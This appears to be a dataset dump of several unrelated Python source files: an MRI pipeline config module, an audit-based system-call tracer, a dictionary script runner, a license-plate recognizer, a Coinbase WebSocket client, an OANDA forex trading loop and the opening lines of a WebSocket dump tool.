source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
config.py
|
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
r"""
A Python module to maintain unique, run-wide *aslprep* settings.
This module implements the memory structures to keep a consistent, singleton config.
Settings are passed across processes via filesystem, and a copy of the settings for
each run and subject is left under
``<output_dir>/sub-<participant_id>/log/<run_unique_id>/aslprep.toml``.
Settings are stored using :abbr:`ToML (Tom's Markup Language)`.
The module has a :py:func:`~aslprep.config.to_filename` function to allow writting out
the settings to hard disk in *ToML* format, which looks like:
.. literalinclude:: ../aslprep/data/tests/config.toml
:language: toml
:name: aslprep.toml
:caption: **Example file representation of aslprep settings**.
This config file is used to pass the settings across processes,
using the :py:func:`~aslprep.config.load` function.
Configuration sections
----------------------
.. autoclass:: environment
:members:
.. autoclass:: execution
:members:
.. autoclass:: workflow
:members:
.. autoclass:: nipype
:members:
Usage
-----
A config file is used to pass settings and collect information as the execution
graph is built across processes.
.. code-block:: Python
from aslprep import config
config_file = config.execution.work_dir / '.aslprep.toml'
config.to_filename(config_file)
# Call build_workflow(config_file, retval) in a subprocess
with Manager() as mgr:
from .workflow import build_workflow
retval = mgr.dict()
p = Process(target=build_workflow, args=(str(config_file), retval))
p.start()
p.join()
config.load(config_file)
# Access configs from any code section as:
value = config.section.setting
Logging
-------
.. autoclass:: loggers
:members:
Other responsibilities
----------------------
The :py:mod:`config` is responsible for other conveniency actions.
* Switching Python's :obj:`multiprocessing` to *forkserver* mode.
* Set up a filter for warnings as early as possible.
* Automated I/O magic operations. Some conversions need to happen in the
store/load processes (e.g., from/to :obj:`~pathlib.Path` \<-\> :obj:`str`,
:py:class:`~bids.layout.BIDSLayout`, etc.)
"""
from multiprocessing import set_start_method
try:
set_start_method('forkserver')
except RuntimeError:
pass # context has been already set
finally:
# Defer all custom import for after initializing the forkserver and
# ignoring the most annoying warnings
import os
import sys
import random
from uuid import uuid4
from pathlib import Path
from time import strftime
from nipype import logging as nlogging, __version__ as _nipype_ver
from templateflow import __version__ as _tf_ver
from . import __version__
if not hasattr(sys, "_is_pytest_session"):
sys._is_pytest_session = False # Trick to avoid sklearn's FutureWarnings
# Disable all warnings in main and children processes only on production versions
if not any((
"+" in __version__,
__version__.endswith(".dirty"),
os.getenv("aslprep_DEV", "0").lower() in ("1", "on", "true", "y", "yes")
)):
from ._warnings import logging
os.environ["PYTHONWARNINGS"] = "ignore"
elif os.getenv("aslprep_WARNINGS", "0").lower() in ("1", "on", "true", "y", "yes"):
# allow disabling warnings on development versions
from ._warnings import logging
else:
import logging
logging.addLevelName(25, 'IMPORTANT') # Add a new level between INFO and WARNING
logging.addLevelName(15, 'VERBOSE') # Add a new level between INFO and DEBUG
DEFAULT_MEMORY_MIN_GB = 0.01
_exec_env = os.name
_docker_ver = None
# special variable set in the container
if os.getenv('IS_DOCKER_8395080871'):
_exec_env = 'singularity'
_cgroup = Path('/proc/1/cgroup')
if _cgroup.exists() and 'docker' in _cgroup.read_text():
_docker_ver = os.getenv('DOCKER_VERSION_8395080871')
_exec_env = 'aslprep-docker' if _docker_ver else 'docker'
del _cgroup
_fs_license = os.getenv('FS_LICENSE')
if not _fs_license and os.getenv('FREESURFER_HOME'):
_fs_home = os.getenv('FREESURFER_HOME')
if _fs_home and (Path(_fs_home) / "license.txt").is_file():
_fs_license = str(Path(_fs_home) / "license.txt")
del _fs_home
_templateflow_home = Path(os.getenv(
'TEMPLATEFLOW_HOME',
os.path.join(os.getenv('HOME'), '.cache', 'templateflow'))
)
try:
from psutil import virtual_memory
_free_mem_at_start = round(virtual_memory().free / 1024**3, 1)
except Exception:
_free_mem_at_start = None
_oc_limit = 'n/a'
_oc_policy = 'n/a'
try:
# Memory policy may have a large effect on types of errors experienced
_proc_oc_path = Path('/proc/sys/vm/overcommit_memory')
if _proc_oc_path.exists():
_oc_policy = {
'0': 'heuristic', '1': 'always', '2': 'never'
}.get(_proc_oc_path.read_text().strip(), 'unknown')
if _oc_policy != 'never':
_proc_oc_kbytes = Path('/proc/sys/vm/overcommit_kbytes')
if _proc_oc_kbytes.exists():
_oc_limit = _proc_oc_kbytes.read_text().strip()
if _oc_limit in ('0', 'n/a') and Path('/proc/sys/vm/overcommit_ratio').exists():
_oc_limit = '{}%'.format(
Path('/proc/sys/vm/overcommit_ratio').read_text().strip()
)
except Exception:
pass
class _Config:
"""An abstract class forbidding instantiation."""
_paths = tuple()
def __init__(self):
"""Avert instantiation."""
raise RuntimeError('Configuration type is not instantiable.')
@classmethod
def load(cls, settings, init=True):
"""Store settings from a dictionary."""
for k, v in settings.items():
if v is None:
continue
if k in cls._paths:
setattr(cls, k, Path(v).absolute())
continue
if hasattr(cls, k):
setattr(cls, k, v)
if init:
try:
cls.init()
except AttributeError:
pass
@classmethod
def get(cls):
"""Return defined settings."""
from .niworkflows.utils.spaces import SpatialReferences, Reference
out = {}
for k, v in cls.__dict__.items():
if k.startswith('_') or v is None:
continue
if callable(getattr(cls, k)):
continue
if k in cls._paths:
v = str(v)
if isinstance(v, SpatialReferences):
v = " ".join([str(s) for s in v.references]) or None
if isinstance(v, Reference):
v = str(v) or None
out[k] = v
return out
class environment(_Config):
"""
Read-only options regarding the platform and environment.
Crawls runtime descriptive settings (e.g., default FreeSurfer license,
execution environment, nipype and *aslprep* versions, etc.).
The ``environment`` section is not loaded in from file,
only written out when settings are exported.
This config section is useful when reporting issues,
and these variables are tracked whenever the user does not
opt-out using the ``--notrack`` argument.
"""
cpu_count = os.cpu_count()
"""Number of available CPUs."""
exec_docker_version = _docker_ver
"""Version of Docker Engine."""
exec_env = _exec_env
"""A string representing the execution platform."""
free_mem = _free_mem_at_start
"""Free memory at start."""
overcommit_policy = _oc_policy
"""Linux's kernel virtual memory overcommit policy."""
overcommit_limit = _oc_limit
"""Linux's kernel virtual memory overcommit limits."""
nipype_version = _nipype_ver
"""Nipype's current version."""
templateflow_version = _tf_ver
"""The TemplateFlow client version installed."""
version = __version__
"""*aslprep*'s version."""
class nipype(_Config):
"""Nipype settings."""
crashfile_format = 'txt'
"""The file format for crashfiles, either text or pickle."""
get_linked_libs = False
"""Run NiPype's tool to enlist linked libraries for every interface."""
memory_gb = None
"""Estimation in GB of the RAM this workflow can allocate at any given time."""
nprocs = os.cpu_count()
"""Number of processes (compute tasks) that can be run in parallel (multiprocessing only)."""
omp_nthreads = None
"""Number of CPUs a single process can access for multithreaded execution."""
plugin = 'MultiProc'
"""NiPype's execution plugin."""
plugin_args = {
'maxtasksperchild': 1,
'raise_insufficient': False,
}
"""Settings for NiPype's execution plugin."""
resource_monitor = False
"""Enable resource monitor."""
stop_on_first_crash = True
"""Whether the workflow should stop or continue after the first error."""
@classmethod
def get_plugin(cls):
"""Format a dictionary for Nipype consumption."""
out = {
'plugin': cls.plugin,
'plugin_args': cls.plugin_args,
}
if cls.plugin in ('MultiProc', 'LegacyMultiProc'):
out['plugin_args']['n_procs'] = int(cls.nprocs)
if cls.memory_gb:
out['plugin_args']['memory_gb'] = float(cls.memory_gb)
return out
@classmethod
def init(cls):
"""Set NiPype configurations."""
from nipype import config as ncfg
# Configure resource_monitor
if cls.resource_monitor:
ncfg.update_config({
'monitoring': {
'enabled': cls.resource_monitor,
'sample_frequency': '0.5',
'summary_append': True,
}
})
ncfg.enable_resource_monitor()
# Nipype config (logs and execution)
ncfg.update_config({
'execution': {
'crashdump_dir': str(execution.log_dir),
'crashfile_format': cls.crashfile_format,
'get_linked_libs': cls.get_linked_libs,
'stop_on_first_crash': cls.stop_on_first_crash,
}
})
if cls.omp_nthreads is None:
cls.omp_nthreads = min(cls.nprocs - 1 if cls.nprocs > 1 else os.cpu_count(), 8)
class execution(_Config):
"""Configure run-level settings."""
anat_derivatives = None
"""A path where anatomical derivatives are found to fast-track *sMRIPrep*."""
bids_dir = None
"""An existing path to the dataset, which must be BIDS-compliant."""
bids_description_hash = None
"""Checksum (SHA256) of the ``dataset_description.json`` of the BIDS dataset."""
bids_filters = None
"""A dictionary of BIDS selection filters."""
boilerplate_only = False
"""Only generate a boilerplate."""
debug = False
"""Run in sloppy mode (meaning, suboptimal parameters that minimize run-time)."""
echo_idx = None
"""Select a particular echo for multi-echo EPI datasets."""
fs_license_file = _fs_license
"""An existing file containing a FreeSurfer license."""
fs_subjects_dir = None
"""FreeSurfer's subjects directory."""
layout = None
"""A :py:class:`~bids.layout.BIDSLayout` object, see :py:func:`init`."""
log_dir = None
"""The path to a directory that contains execution logs."""
log_level = 25
"""Output verbosity."""
low_mem = None
"""Utilize uncompressed NIfTIs and other tricks to minimize memory allocation."""
md_only_boilerplate = False
"""Do not convert boilerplate from MarkDown to LaTex and HTML."""
notrack = False
"""Do not monitor *aslprep* using Sentry.io."""
output_dir = None
"""Folder where derivatives will be stored."""
output_spaces = None
"""List of (non)standard spaces designated (with the ``--output-spaces`` flag of
the command line) as spatial references for outputs."""
reports_only = False
"""Only build the reports, based on the reportlets found in a cached working directory."""
run_uuid = '%s_%s' % (strftime('%Y%m%d-%H%M%S'), uuid4())
"""Unique identifier of this particular run."""
participant_label = None
"""List of participant identifiers that are to be preprocessed."""
task_id = None
"""Select a particular task from all available in the dataset."""
templateflow_home = _templateflow_home
"""The root folder of the TemplateFlow client."""
work_dir = Path('work').absolute()
"""Path to a working directory where intermediate results will be available."""
write_graph = False
"""Write out the computational graph corresponding to the planned preprocessing."""
_layout = None
_paths = (
'anat_derivatives',
'bids_dir',
'fs_license_file',
'fs_subjects_dir',
'layout',
'log_dir',
'output_dir',
'templateflow_home',
'work_dir',
)
@classmethod
def init(cls):
"""Create a new BIDS Layout accessible with :attr:`~execution.layout`."""
if cls.fs_license_file and Path(cls.fs_license_file).is_file():
os.environ["FS_LICENSE"] = str(cls.fs_license_file)
if cls._layout is None:
import re
from bids.layout import BIDSLayout
work_dir = cls.work_dir / 'bids.db'
work_dir.mkdir(exist_ok=True, parents=True)
cls._layout = BIDSLayout(
str(cls.bids_dir),
validate=False,
# database_path=str(work_dir),
ignore=("code", "stimuli", "sourcedata", "models",
"derivatives", re.compile(r'^\.')))
cls.layout = cls._layout
# These variables are not necessary anymore
del _fs_license
del _exec_env
del _nipype_ver
del _templateflow_home
del _tf_ver
del _free_mem_at_start
del _oc_limit
del _oc_policy
class workflow(_Config):
"""Configure the particular execution graph of this workflow."""
anat_only = False
"""Execute the anatomical preprocessing only."""
asl2t1w_dof = 6
"""Degrees of freedom of the ASL-to-T1w registration steps."""
asl2t1w_init = 'register'
"""Whether to use standard coregistration ('register') or to initialize coregistration from the
ASL image-header ('header')."""
m0_scale = float(1)
"""relative scale between asl and M0."""
fmap_bspline = None
"""Regularize fieldmaps with a field of B-Spline basis."""
fmap_demean = None
"""Remove the mean from fieldmaps."""
force_syn = None
"""Run *fieldmap-less* susceptibility-derived distortions estimation."""
hires = None
"""Run with the ``-hires`` flag."""
ignore = None
"""Ignore particular steps for *aslprep*."""
longitudinal = False
"""Run with the ``-logitudinal`` flag."""
random_seed = None
"""Master random seed to initialize the Pseudorandom Number Generator (PRNG)"""
skull_strip_fixed_seed = False
"""Fix a seed for skull-stripping."""
skull_strip_template = "OASIS30ANTs"
"""Change default brain extraction template."""
skull_strip_t1w = "force"
"""Skip brain extraction of the T1w image (default is ``force``, meaning that
*aslprep* will run brain extraction of the T1w)."""
spaces = None
"""Keeps the :py:class:`~.niworkflows.utils.spaces.SpatialReferences`
instance keeping standard and nonstandard spaces."""
use_bbr = None
"""Run boundary-based registration for ASL-to-T1w registration."""
use_syn_sdc = None
"""Run *fieldmap-less* susceptibility-derived distortions estimation
in the absence of any alternatives."""
dummy_vols = int(0)
""" pair for label-control volume to be deleted before cbf computation."""
smooth_kernel = float(5)
""" kernel size for smoothing M0."""
scorescrub = False
""" run scorescrub, Sudipto's alogrothims for denoisng CBF """
basil = False
""" run BASIL, FSL utils to compute CBF with spatial regularilization and
partial volume correction """
class loggers:
"""Keep loggers easily accessible (see :py:func:`init`)."""
_fmt = "%(asctime)s,%(msecs)d %(name)-2s " "%(levelname)-2s:\n\t %(message)s"
_datefmt = "%y%m%d-%H:%M:%S"
default = logging.getLogger()
"""The root logger."""
cli = logging.getLogger('cli')
"""Command-line interface logging."""
workflow = nlogging.getLogger('nipype.workflow')
"""NiPype's workflow logger."""
interface = nlogging.getLogger('nipype.interface')
"""NiPype's interface logger."""
utils = nlogging.getLogger('nipype.utils')
"""NiPype's utils logger."""
@classmethod
def init(cls):
"""
Set the log level, initialize all loggers into :py:class:`loggers`.
* Add new logger levels (25: IMPORTANT, and 15: VERBOSE).
* Add a new sub-logger (``cli``).
* Logger configuration.
"""
from nipype import config as ncfg
_handler = logging.StreamHandler(stream=sys.stdout)
_handler.setFormatter(
logging.Formatter(fmt=cls._fmt, datefmt=cls._datefmt)
)
cls.cli.addHandler(_handler)
cls.default.setLevel(execution.log_level)
cls.cli.setLevel(execution.log_level)
cls.interface.setLevel(execution.log_level)
cls.workflow.setLevel(execution.log_level)
cls.utils.setLevel(execution.log_level)
ncfg.update_config({
'logging': {
'log_directory': str(execution.log_dir),
'log_to_file': True
},
})
class seeds(_Config):
"""Initialize the PRNG and track random seed assignments"""
master = None
"""Master seed used to generate all other tracked seeds"""
ants = None
"""Seed used for antsRegistration, antsAI, antsMotionCorr"""
@classmethod
def init(cls):
cls.master = workflow.random_seed
if cls.master is None:
cls.master = random.randint(1, 65536)
random.seed(cls.master) # initialize the PRNG
# functions to set program specific seeds
cls.ants = _set_ants_seed()
def _set_ants_seed():
"""Fix random seed for antsRegistration, antsAI, antsMotionCorr"""
val = random.randint(1, 65536)
os.environ['ANTS_RANDOM_SEED'] = str(val)
return val
def from_dict(settings):
"""Read settings from a flat dictionary."""
nipype.load(settings)
execution.load(settings)
workflow.load(settings)
seeds.init()
loggers.init()
def load(filename):
"""Load settings from file."""
from toml import loads
filename = Path(filename)
settings = loads(filename.read_text())
for sectionname, configs in settings.items():
if sectionname != 'environment':
section = getattr(sys.modules[__name__], sectionname)
section.load(configs)
init_spaces()
def get(flat=False):
"""Get config as a dict."""
settings = {
'environment': environment.get(),
'execution': execution.get(),
'workflow': workflow.get(),
'nipype': nipype.get(),
'seeds': seeds.get(),
}
if not flat:
return settings
return {'.'.join((section, k)): v
for section, configs in settings.items()
for k, v in configs.items()}
def dumps():
"""Format config into toml."""
from toml import dumps
return dumps(get())
def to_filename(filename):
"""Write settings to file."""
filename = Path(filename)
filename.write_text(dumps())
def init_spaces(checkpoint=True):
"""Initialize the :attr:`~workflow.spaces` setting."""
from .niworkflows.utils.spaces import Reference, SpatialReferences
spaces = execution.output_spaces or SpatialReferences()
if not isinstance(spaces, SpatialReferences):
spaces = SpatialReferences(
[ref for s in spaces.split(' ')
for ref in Reference.from_string(s)]
)
if checkpoint and not spaces.is_cached():
spaces.checkpoint()
# Add the default standard space if not already present (required by several sub-workflows)
if "MNI152NLin2009cAsym" not in spaces.get_spaces(nonstandard=False, dim=(3,)):
spaces.add(
Reference("MNI152NLin2009cAsym", {})
)
# Make the SpatialReferences object available
workflow.spaces = spaces
|
system_call_tracer.py
|
from collections import deque
from datetime import datetime
import psutil
import re
import subprocess
from subprocess import PIPE
import sys
import threading
import time
class SystemCallTracer:
"""System Call Tracer class.
Traces the system calls being made by a process defined by a given
pid. The run() method will be started and it will run in the
background until the application exits.
"""
def __init__(self, trace_pid):
""" Constructor.
Initialize system call sliding window sequence, and background
thread necessary for tracing system calls.
Args:
trace_pid (int): pid of the process to trace.
"""
# Check if the given pid exists
if not psutil.pid_exists(trace_pid):
print("The given pid does not exist!")
sys.exit()
#: int: the pid to trace
self._trace_pid = trace_pid
#: deque of str: the sequence of the 50 most recent system
# calls ordered from oldest to newest
self._syscall_sequence = deque('', 50)
# Initialize and start background thread for tracing system
# calls
thread = threading.Thread(target=self._run, daemon=True)
thread.start()
# Create a lock
self._lock = threading.Lock()
def _run(self):
""" Trace system calls being made by the given pid.
Counts the frequency of system calls and keeps track of the
sequence in which system calls are made in a 5 second window.
"""
# Add audit rules for tracing the given pid
# TODO: Should we also track system calls made by child
# processes of the process being traced?
# i.e. add 'ppid={pid}' to AUDITCTL_COMMAND
AUDITCTL_COMMAND = \
'sudo auditctl -a always,exit -S all -F pid={pid}'.format(
pid=self._trace_pid)
process = \
subprocess.run(
AUDITCTL_COMMAND,
stdout=PIPE,
stderr=PIPE,
shell=True)
# The time_format_str given to strftime() is the format in which
# ausearch expects time arguments
time_format_str = '%m/%d/%Y %H:%M:%S'
# Set the last_traced_time to the current time
last_traced_time = datetime.now().strftime(time_format_str)
# Get the system calls made by the given pid as often as
# possible
# TODO: Implement realtime streaming from the audit log to
# process each event one by one
while True:
# Set the ausearch command
AUSEARCH_COMMAND = \
'sudo ausearch --interpret --pid {pid} \
--start {last_traced_time}'.format(
pid=self._trace_pid,
last_traced_time=last_traced_time)
# Run the ausearch command and get its output
process = \
subprocess.run(
AUSEARCH_COMMAND,
stdout=PIPE,
stderr=PIPE,
shell=True)
# Update the last traced time
last_traced_time = datetime.now().strftime(time_format_str)
# Get output from the ausearch command
process_output = process.stdout.decode('utf-8').split('\n')
# Parse each line of ausearch output for system calls and
# acquire/release the lock to prevent access of the system
# call sequence before it's finished updating
# TODO: Figure out how to split the pattern string without
# the resulting tabs being included in the regex
# pattern
pattern = \
re.compile(
'\((?P<calltime>\d\d/\d\d/\d\d\d\d \d\d:\d\d:\d\d).*syscall=(?P<syscall>\S+)')
with self._lock:
for line in process_output:
# Search the current line for the regex pattern
match = pattern.search(line)
# If a match was found
if match is not None:
# Append the system call to _syscall_sequence
calltime = match.group('calltime')
syscall = match.group('syscall')
self._syscall_sequence.append((calltime, syscall))
def print_trace(self):
""" Print the last 50 system calls.
Prints the sequence of the last 50 system calls ordered from oldest to
newest and prints each system call with its call frequency.
"""
# Acquire/release the lock to prevent access of the system call
# sequence before it's finished printing
with self._lock:
print('**************************************************')
print()
print('Printing the last 50 system calls...')
print()
# Print last 50 system call sequence
print('System call sequence:')
for (calltime, syscall) in self._syscall_sequence:
print(
'({calltime}, \'{syscall}\'), '.format(
calltime=calltime,
syscall=syscall),
end='')
print()
print()
# Calculate system call frequencies
syscall_frequencies = {}
for _, syscall in self._syscall_sequence:
syscall_frequencies[syscall] = \
syscall_frequencies.setdefault(syscall, 0) + 1
# Print system call frequencies
print('System call frequencies:')
for key in sorted(syscall_frequencies):
print(
'\'{syscall}\': {frequency}, '.format(
syscall=key,
frequency=syscall_frequencies[key]),
end='')
print()
print()
print('**************************************************')
print()
|
__main__.py
|
import subprocess
import sys
import threading
FILES = {
"ca-langs.py": "wikidict/lang/ca/langs.py",
"de-abk.py": "wikidict/lang/de/abk.py",
"de-langs.py": "wikidict/lang/de/langs.py",
"de-lang_adjs.py": "wikidict/lang/de/lang_adjs.py",
"en-form-of.py": "wikidict/lang/en/form_of.py",
"el-langs.py": "wikidict/lang/el/langs.py",
"en-labels.py": "wikidict/lang/en/labels.py",
"en-langs.py": "wikidict/lang/en/langs.py",
"en-places.py": "wikidict/lang/en/places.py",
"es-langs.py": "wikidict/lang/es/langs.py",
"es-campos-semanticos.py": "wikidict/lang/es/campos_semanticos.py",
"fr-domain-templates.py": "wikidict/lang/fr/domain_templates.py",
"fr-langs.py": "wikidict/lang/fr/langs.py",
"fr-regions.py": "wikidict/lang/fr/regions.py",
"fr-temps-geologiques.py": "wikidict/lang/fr/temps_geologiques.py",
"pt-escopo.py": "wikidict/lang/pt/escopos.py",
"pt-gramatica.py": "wikidict/lang/pt/gramatica.py",
"pt-langs.py": "wikidict/lang/pt/langs.py",
}
def replace(file: str, data: str) -> bool:
"""Update contents in the file, even if there was no change."""
with open(file) as fh:
original_content = fh.read()
start = original_content.find("# START")
end = original_content.find("# END")
if start == -1 or end == -1:
return False
new_content = f"{original_content[:start]}# START\n{data}{original_content[end:]}"
with open(file, "w") as fh:
fh.write(new_content)
return True
def process_script(script: str, file: str) -> None:
"""Process one script."""
data = subprocess.check_output(["python", f"scripts/{script}"], text=True)
if replace(file, data):
print(f"Processed {script} with success.", flush=True)
else:
print(f" !! Error processing {script}", flush=True)
def main():
"""Entry point."""
threads = []
for script, file in sorted(FILES.items()):
th = threading.Thread(target=process_script, args=(script, file))
th.start()
threads.append(th)
for th in threads:
th.join()
print("\nFriendly reminder: run ./check.sh")
if __name__ == "__main__":
sys.exit(main())
|
test.py
|
import cv2
import time
import threading
from class_CNN import NeuralNetwork
from class_PlateDetection import PlateDetector
from utils.average_plate import *
from utils.find_best_quality_images import get_best_images
########### INIT ###########
# Initialize the plate detector
plateDetector = PlateDetector(type_of_plate='RECT_PLATE',
minPlateArea=4100,
maxPlateArea=15000)
# Initialize the Neural Network
myNetwork = NeuralNetwork(modelFile="model/binary_128_0.50_ver3.pb",
labelFile="model/binary_128_0.50_labels_ver2.txt")
list_char_on_plate = [] # contains an array of the segmented characters in each frame
countPlates = 0 # count the number of same plates
recog_plate = ''
coordinates = (0, 0)
num_frame_without_plates = 0
countPlates_threshold = 11 # the maximum number of images of the same plate to get
###########################
def recognized_plate(list_char_on_plate, size):
"""
input is a list that contains a images of the same plate
get the best images in the list
calculates the average plate
"""
global recog_plate
t0 = time.time()
plates_value = []
plates_length = []
list_char_on_plate = get_best_images(list_char_on_plate, num_img_return=7) # get the best images
for segmented_characters in list_char_on_plate:
plate, len_plate = myNetwork.label_image_list(segmented_characters[1], size)
plates_value.append(plate)
plates_length.append(len_plate)
final_plate = get_average_plate_value(plates_value, plates_length) # calculates the average plate
if len(final_plate) > 7:
if (final_plate[2] == '8'):
final_plate = final_plate[:2] + 'B' + final_plate[3:]
elif (final_plate[2] == '0'):
final_plate = final_plate[:2] + 'D' + final_plate[3:]
recog_plate = final_plate
print("recognized plate: " + final_plate)
print("threading time: " + str(time.time() - t0))
cap = cv2.VideoCapture('test_videos/test.MOV') # video path
if __name__=="__main__":
while(cap.isOpened()):
ret, frame = cap.read()
if (frame is None):
print("[INFO] End of Video")
break
_frame = cv2.resize(frame, (960, 540)) # resize the frame to fit the screen
frame_height, frame_width = frame.shape[:2]
_frame_height, _frame_width = _frame.shape[:2]
cropped_frame = frame[int(frame_height*0.3):frame_height, 0:int(frame_width*0.8)] # crop the ROI
cv2.rectangle(_frame, (0, int(_frame_height*0.3)), (int(_frame_width*0.8), _frame_height), (255, 0, 0), 2) # draw a
# rectangle to locate the ROI
# print the result
cv2.rectangle(_frame, (0, 0), (190, 40), (0, 0, 0), -1)
cv2.putText(_frame, recog_plate, (20, 30), cv2.FONT_HERSHEY_SIMPLEX, 1, (255,255,255), 2, cv2.LINE_AA)
# out.write(_frame)
cv2.imshow('video', _frame)
possible_plates = plateDetector.find_possible_plates(cropped_frame)
# cv2.imshow('morphed', plateDetector.after_preprocess)
if possible_plates is not None:
num_frame_without_plates = 0
distance = tracking(coordinates, plateDetector.corresponding_area[0]) # calculates the distance between two plates
coordinates = plateDetector.corresponding_area[0] # get the coordinate of the detected plate
if (distance < 100):
if(countPlates < countPlates_threshold):
cv2.imshow('Plate', possible_plates[0])
temp = []
temp.append(possible_plates[0])
temp.append(plateDetector.char_on_plate[0]) # temp = [image of plate, segmented characters on plate]
list_char_on_plate.append(temp)
countPlates += 1
elif(countPlates == countPlates_threshold):
# create a new thread for image recognition
threading.Thread(target=recognized_plate, args=(list_char_on_plate, 128)).start()
countPlates += 1
else:
countPlates = 0
list_char_on_plate = []
# the program will try to catch 11 images of the same plate and then pick the top 7 best
# quality images out of 11. However, if the program cannot catch enough images, after
# num_frame_without_plates frames without plates, it will process the and calculate the
# final plate
if (possible_plates == None):
num_frame_without_plates += 1
if (countPlates <= countPlates_threshold and countPlates > 0 and num_frame_without_plates > 5):
threading.Thread(target=recognized_plate, args=(list_char_on_plate, 128)).start()
countPlates = 0
if cv2.waitKey(1) & 0xFF == ord('q'):
break
cap.release()
cv2.destroyAllWindows()
|
websock.py
|
"""The WebSocket Feed provides real-time market data updates for orders and
trades.
Find more here: `<https://docs.exchange.coinbase.com/#websocket-feed>`_
.. module:: websock
:synopsis: WebSocket Feed
.. moduleauthor:: Alexander Simeonov <agsimeon@buffalo.edu>
"""
from json import dumps, loads
from threading import Lock, Thread
from time import sleep
from websocket import create_connection
from cbexchange.client import APIClient
class WSClient(APIClient):
"""API Client for Coinbase Exchange WebSocket Feed.
This class starts in a disconnected state so make sure to connect before
attempting to receive any messages. When using the 'with' statement the
client connects and disconnects automatically.
Once connected the client starts a thread which keeps the WebSocket alive
using periodic pings. There will be only one keep alive thread per client
instance. If the WebSocket connection is somehow lost, the keep alive thread
will clean up and exit.
The client is iterable over the messages in the feed:
:Example:
>>> from cbexchange.websock import WSClient
>>> client = WSClient()
>>> client.connect()
>>> for message in client:
>>> print(message)
The client supports the 'with' statment:
:Example:
>>> from cbexchange.websock import WSClient
>>> with WSClient() as client:
>>> print(client.receive())
:param str ws_uri: WebSocket URI.
:param str ws_type: `<https://docs.exchange.coinbase.com/#subscribe>`_
:param str ws_product_id: `<https://docs.exchange.coinbase.com/#subscribe>`_
"""
WS_URI = 'wss://ws-feed.exchange.coinbase.com'
WS_TYPE = 'subscribe'
WS_PRODUCT_ID = 'BTC-USD'
def __init__(self, ws_uri=None, ws_type=None, ws_product_id=None):
self.WS_URI = ws_uri or self.WS_URI
self.WS_TYPE = ws_type or self.WS_TYPE
self.WS_PRODUCT_ID = ws_product_id or self.WS_PRODUCT_ID
self._ws = None
self._thread = None
self._lock = Lock()
def __iter__(self):
return self
def __enter__(self):
self.connect()
return self
def __exit__(self, type, value, traceback):
self.disconnect()
def __next__(self):
"""Iterator function for Python 3.
:returns: the next message in the sequence
:rtype: dict
:raises StopIteration: if the WebSocket is not connected
"""
next = self.receive()
if next:
return next
raise StopIteration
# Iterator function for Python 2.
next = __next__
def _format_message(self, message):
"""Makes sure messages are Pythonic.
:param str message: raw message
:returns: Pythonic message
:rtype: dict
"""
return loads(message)
def _keep_alive_thread(self):
"""Used exclusively as a thread which keeps the WebSocket alive."""
while True:
with self._lock:
if self.connected():
self._ws.ping()
else:
self.disconnect()
self._thread = None
return
sleep(30)
def connect(self):
"""Connects and subscribes to the WebSocket Feed."""
if not self.connected():
self._ws = create_connection(self.WS_URI)
message = {
'type':self.WS_TYPE,
'product_id':self.WS_PRODUCT_ID
}
self._ws.send(dumps(message))
# There will be only one keep alive thread per client instance
with self._lock:
if not self._thread:
thread = Thread(target=self._keep_alive_thread, args=[])
thread.start()
def disconnect(self):
"""Disconnects from the WebSocket Feed."""
if self.connected():
self._ws.close()
self._ws = None
def receive(self):
"""Receive the next message in the sequence.
:returns: the next message in the sequence, None if not connected
:rtype: dict
"""
if self.connected():
return self._format_message(self._ws.recv())
return None
def connected(self):
"""Checks if we are connected to the WebSocket Feed.
:returns: True if connected, otherwise False
:rtype: bool
"""
if self._ws:
return self._ws.connected
return False
|
trading.py
|
import copy
from decimal import Decimal, getcontext
import logging
import logging.config
import queue
import threading
import time
from qsforex.execution.execution import OANDAExecutionHandler
from qsforex.portfolio.portfolio import Portfolio
from qsforex import settings
from qsforex.strategy.strategy import TestStrategy
from qsforex.pricing.streaming import StreamingForexPrices
from broker.oanda.common.constants import OANDA_ENVIRONMENTS
def trade(events, strategy, portfolio, execution, heartbeat):
"""
Carries out an infinite while loop that polls the
events queue and directs each event to either the
strategy component of the execution handler. The
loop will then pause for "heartbeat" seconds and
continue.
"""
while True:
try:
event = events.get(False)
except queue.Empty:
pass
else:
if event is not None:
if event.type == 'TICK':
logger.info("Received new tick event: %s", event)
strategy.calculate_signals(event)
portfolio.update_portfolio(event)
elif event.type == 'SIGNAL':
logger.info("Received new signal event: %s", event)
portfolio.execute_signal(event)
elif event.type == 'ORDER':
logger.info("Received new order event: %s", event)
execution.execute_order(event)
time.sleep(heartbeat)
if __name__ == "__main__":
OANDA_STREAM_DOMAIN = OANDA_ENVIRONMENTS["streaming"][settings.OANDA_DOMAIN]
OANDA_API_DOMAIN = OANDA_ENVIRONMENTS["api"][settings.OANDA_DOMAIN]
# Set up logging
logging.config.fileConfig('../logging.conf')
logger = logging.getLogger('qsforex.trading.trading')
# Set the number of decimal places to 2
getcontext().prec = 2
heartbeat = 0.0 # Time in seconds between polling
events = queue.Queue(maxsize=2000)
equity = settings.EQUITY
# Pairs to include in streaming data set
pairs = ["GBPUSD"]
# Create the OANDA market price streaming class
# making sure to provide authentication commands
prices = StreamingForexPrices(
OANDA_STREAM_DOMAIN, settings.OANDA_ACCESS_TOKEN,
settings.OANDA_ACCOUNT_ID, pairs, events
)
# Create the strategy/signal generator, passing the
# instrument and the events queue
strategy = TestStrategy(pairs, events)
# Create the portfolio object that will be used to
# compare the OANDA positions with the local, to
# ensure backtesting integrity.
portfolio = Portfolio(
prices, events, equity=equity, backtest=False
)
# Create the execution handler making sure to
# provide authentication commands
execution = OANDAExecutionHandler(
OANDA_API_DOMAIN,
settings.ACCESS_TOKEN,
settings.ACCOUNT_ID
)
# Create two separate threads: One for the trading loop
# and another for the market price streaming class
trade_thread = threading.Thread(
target=trade, args=(
events, strategy, portfolio, execution, heartbeat
)
)
price_thread = threading.Thread(target=prices.stream_to_queue, args=[])
# Start both threads
logger.info("Starting trading thread")
trade_thread.start()
logger.info("Starting price streaming thread")
price_thread.start()
|
wsdump.py
|
#!/Users/Nish/Dropbox/SlackBot-SS/starterbot/bin/python2.7
import argparse
import code
import sys
import threading
import time
import six
from six.moves.urllib.parse import urlparse
import websocket
try:
import readline
except ImportError:
pass
def get_encoding():
encoding = getattr(sys.stdin, "encoding", "")
if not encoding:
return "utf-8"
else:
return encoding.lower()
